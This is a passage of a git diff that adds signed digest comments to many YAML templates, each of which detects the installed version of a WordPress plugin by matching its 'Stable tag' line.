-46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200e2c741240415b4aa64c602b57e0356dcaa10f727b42b8a9acb5c5273bfe98c9022100bd295a8c9c24926bbe0f692730562648e2d7c647ccbfeb8e0b0e79bc588ce357:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..0d45b9aee4 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dd235b79515e8025c4bdb0cc23fe196e1807610fd12ad99f29611f1299d44ff602210084a9c7ca18c4143da4f4b71502bbf4a953592974f7756c66a491fd4b4a28a7a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..48346eda1a 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203c6a6cf7b3dc7ac5ad2a1e838f0ba48c948b372e3c1637e87cd9b89de9d0198302205e8801469298410d5478f064e5faf9f0ef7c0dd72515ad78b99b138eddb746c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..617d02c4c5 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008e045149674e95c6eeb73e5ef1de1ee7831ff4bb3d5c39e544b6514b304b29fd022100ed0f17899e7c9e80ca5393a1bc8d4b070979337e1221ae67af24a1c9106abe15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..9e44e93245 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fdcc219c1c3f15469aa319768e15152907c72c45085430b43a13a823dfb9e810022100c10b3e76ff645f27e3db856965be9cc2af616e37202fc6bb3b55499eeabf78b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..d34b30d612 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d0c0a574af81da0aeff9617fe5055059343e9abdc7e71d647f67513c41103bc702207ecc6bc7c1b86f9d091573593e0e4e9c81b9117c35e3dc8a7b36610a87b0ca26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..92bea5dbb8 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b29636b39279b4d6a6b488aa0b1823938ac07ead53e5b2553bd43368545fcdec022100980e8ae3fd1b1ffea5ffe604da967ac66220cc26dbff3b54c3c283ee9c130bae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..9d71ad66a4 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207d351ecdf0288b837c956ae4cb1226ec807393bad3e1fe5bc4cd5c626f084b87022100eb7711105f4d840472eb1d2654e74c128d7243852e3264249524d98de54a3f2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..3ab68d99e1 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100be02d8da8fa350e781fd9fa0c34e98c68a85a5b93fabc3c695e4e9e248e3d40b022100af508ddcc7586d3f3f72b8e87cd47979ea60ea85f05c904b79144ad208554f5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..8a4096d8e2 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c6da803363bc2fd8da65190e7488c51e5bb4923baa3ba0396a01f29998699706022100b158575a084c048d83c564493a8a8adf3912e3e3b86da334303508c2ef229a41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..ecf5cdd571 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fe3a0a3a556252315e20c6cacea8b6d1f1eca2b5d25f848eed9aa712457d12b5022100abdcf5b6b5b85648c7f535ad49ea9676f0e9d3941fafd69fa873bcd95ebb3f9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..a395abea79 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206b70d911d88b4d4f3424f85ce7cc6f4ee8f753c6fd06ba33c18240917fc70c09022100e051dc57e981a7aafb24d16952cc8e473bde8e5053682d66f17afeef8f9c24ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..a831431abb 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201bee6cb3de199ddbb8f5ab9d5d528c257aca496ff68a0a7b8eec46ecf90c122002210096043b7908fb89e968db747fdfc7607c3a17eccc14312bbbe1d8c7dd17e369a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..0423bdb09e 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008c6cdf9a3a98d5d8c0620933c19c3a8589c3a2da2742140cb6ab78fd752b66e9022100d530f05d4e44a323f8ac7f4953dc92f64a32fc886d4e298af49976b12397e1a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..4450dcdd1f 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a8904e9d8d3e4de44564718ba3a4be180335d0ea1da66ba3040fff16d481bbc202205ea9c39f7756da0732bbbd63c2d00cb6b5a69c8180b2f9746fbf660936b43b59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..23260f51b1 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204355aea76879dbb2547218136d40ee5a8f416f78ed4ed9f3f3abdfa2cee38b45022049626e18ee01f064566980a34f4a8eba064a65f92ab63ae9b586b94bedaf86f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..57b7dc192c 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b5b6c29198f996cabb15915bccf31ca3965b9a1debcd33d5c05054008ee1b782022044cd9306a7873bd86e0af4f7abb08bc74ebd9c428334116e703de1eea3cc79a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..9ce1d1ee82 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022012c3edf605f3f61ee10fa8642da8ec1c5b4e3302b693063f56812288f02f6851022064cd00ea5a6f4aa431dfc4b1ae792bc7407dcc9cbb2ef1d3f1b21091db37faa6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..1e31205f6e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220169a7998273d320dfc4eaa449f8b14c6739bad56864a6c4598b03bb5e4721bf80221009085c1e869c143a4b6ef102eebb3107dd52c2d9a3b6b99d08a1fafbc54b67510:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..cd89722bfb 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201901912c6cffb4c51e924e8b31e37abffe993d35cffecec968649704768f23e4022100bf3a311bc9bc76fdd08ac699c4bc1d59b3cc857feb2213675aa9ce8ad3be3e25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..c8cf1a90e0 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206078880b24cf182639550a907f5a5b6e3cfec9a355e0ace71fe4ecd6b2a66843022100aed01c76cb49e540f982eb4b0f0594b0b7a5bdd65ec81248fbfae5265ff8ddae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..cdc2b37b5d 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aa554f3041abffcb1b466bb8bfb1522f0cf0513638a6ab575dc699bd3a8ca60e02207d5fc707fe8c9a586ca0f60dfb8f5bb4403333b58c00b55bb04cc693b40f6d8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..9ddc7a13cb 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201ca33bc25042235020ad90c9701b95cbafa2d850928274e3a60a10757f2a5c1d022049c665db605b00629db0860d90922cf7f313354e16870741b4673a3fe1fb1701:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..fd91825aa8 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203c97d3d94ea98ded08db9f8efa9c68369ac1f0bb51088aadc181104dd4650986022100bd5680be30f45e204452eb0134c844e16511abba94d1a32ead2a7652c2f28db5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..c2fb8e6ef8 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dadcc29eee32e65e4424d93df2fb1f5103bd65bcd90fe6dcab6d27dd0594f80c022078d1c7954190ff4ea05a764146cb29fb70dd6d184c85a06b56a5725c40c017f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..da6ea03d70 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100819e67d902ce182bb6ce0daaef15db31034ea2ec59f1e7c3528bee1d22f3d841022047ab825bc97447e3aaa2d7c60dcb446a8ec907fa0643b6bf51bdeadd979e33ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..581278b421 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022017e35e797f5826eba539a9976003baae1b499be6db06dea8ece8f535d0dee781022100ba426e2f895f8d814676794c6cbebc18abf2c6a32297496d8c6595403dbe9203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..0441916880 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206351224511f9b747ac01d13048e8a5fb4e4ff60dbc5e4c10d79b5f29bb2c6762022100dd2029415be8bb0f02719ccf6a0924ad319514f270c43c5e134a3499ef54181b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..a458625cef 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022037771ed0fa3b35c3138333f1b038bed00f2c33ab6d9b9e9e00c74aa23d7c7de4022100a585f85e5166e2df23ff54539aa3bc531241b31b5ce36f44a262f7ca30a000d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..06429830c9 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220392c4b89f97af30a56e305cdfc434d8038773c01234017d6d9a144bdabf61c0a02210083e11bb7271d19bd846cfd73b0216a9068419e3b3bc46eb31e81a0dee74f3aa4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..de8644e5ed 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204229770c35bb0aedbf5e5e03fbecd6a6348d6b09dc65f62a6f44da3c5f22dce3022100cf2ccb309bc3107b6193cfafc0aa0a10121d514959fbab6520b2b8def7b2acd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..2fed495cbb 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ca1cefae0b473e1da4815ad79a39bc792ea3f3fc0ee821d5580bf0ff75d3555d022100ac3316317bc62c58572fca30975b34bfc379b2262643195ba573c8a012719c52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..66dfc39a34 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d510567cbb34b273bbaff62d328ca7f42e83a3259011511f8127089b1dab6763022100b39a22e78bcb5a20ee2c0e3769ad6dc31b142a93c58d77faa0419b5e3b1b8802:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..fda1c44436 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203152f467ef2a7658fb42727041ff99b0c7e95e857148f91c4cb4c82bf99bc48e022100aaa582119c4bee694a00c56f00772cdba8ea7c433184a80b78aaf0a0e10248f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..14316bca01 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220327dc0aaaeae271bffd253e3da4b412a1a6c44393ba3a2e9503acdb48114caf802206852c0370c3dbcc5286656fda0112e1296f154867e1e71e4f4e756ebb9c4d34e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..f89f118387 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022007e31f84a24d991dc8cd347ed1516c807ace20daa3d0fa4baf3a28e3d66ed2e702210097bffc445465ed12f14a865286f9fd8e538103f6db056133129d622ab9c17f6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..c49c224c93 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203994240eb56d7cf81a37c2d9d1aa3fe1d456cbb2b9327570335782223777e101022100fef26ed276ee9cc5c5b27be79aa3ba924d0e44a02e66c8d298cab5a7d70aa1fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..081ae7ed09 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202b8634e1cf50ef0f6cfbbd8e977deb73d24e3d49f91e0daf5100d1fac585d61e02207fab46726256e6e104a11ddc1c7531dc99726c21ed1a5d2f935068dd363bd733:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..b5d69743c0 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200a9dd1cae02f11cc00b9190684fb5a6597606d4914b19f2859373a4bcb46a24c0220306bcb06cd2c5df3a1ce04d0ceb270ed16a76d68a3b387a4e5d6e349bae27339:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..80681191ea 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b11b37029d3cb7faf7b9fbba735fb5ed16daa7c341c02d59e0f01297d6d8f3a1022100e51ddd28bda244e5f676eb56e1aea59d29a3061cb051ddec6c58c9c1956a2aef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..191717e883 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022035e2e9315fcb73e11e158b1f6d4fb971a0978f8f4377236677756b4248ca9c7302207152cca378fb1e99b2ea2b36613ff5059bb9fcbcc0e9d254fb9aaa4f0ab34819:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..3f2ba4b7ac 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207f246dbf0a8b17bc7d8ce5d1e8f479b9a55677f7e689ca097dcfd95d39966b90022100a5f4dfabc78c1e1e87403bda94d35be92d435bbd5417695531a355b384899970:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..c888b9a8fc 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c1f1001f9239c6f2a845068aa978c505ed12d979673c6ade580c9876a0d372da022100ccac4bc0605bbb229dbfffbd18025973640112ef91979a5136ebdfbbef033f94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389d..eb3c4c4416 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022024fd7a91b247e636f28b95a2ef94b5bfa4983148b404741a5d0659bff9ce141002205e36b865c160825fad5429bd21cf2837157be59723735909736f4c5936ad016a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..c3209a289d 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100befda96cd90b00ac57e465b710153bd7a7146639937e91bfdc32733d2c648977022100a4df02ed8ceef6cbc32f3d37dec9c2555731e940da9b54e553dddfc021ff0a86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..b3b81ce80b 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c0337dbc570e0a3c09bb42283a7d5603a0e6f41e0687eeb4a7e1c8b2d01c3eec02207827accbfe06c35a9188739248fa9741c03db234257ddbede252b7cd01cda493:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..afc24fc1a1 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a430ac93d8462ac88f2bc890fadabd15d24da0d39650b55328224a2c8a4b05db0221008a1577e2f334d3390ed0bc93465347539befa5c97a3bde3bf96542c808ed7c1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..56a85ea29b 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 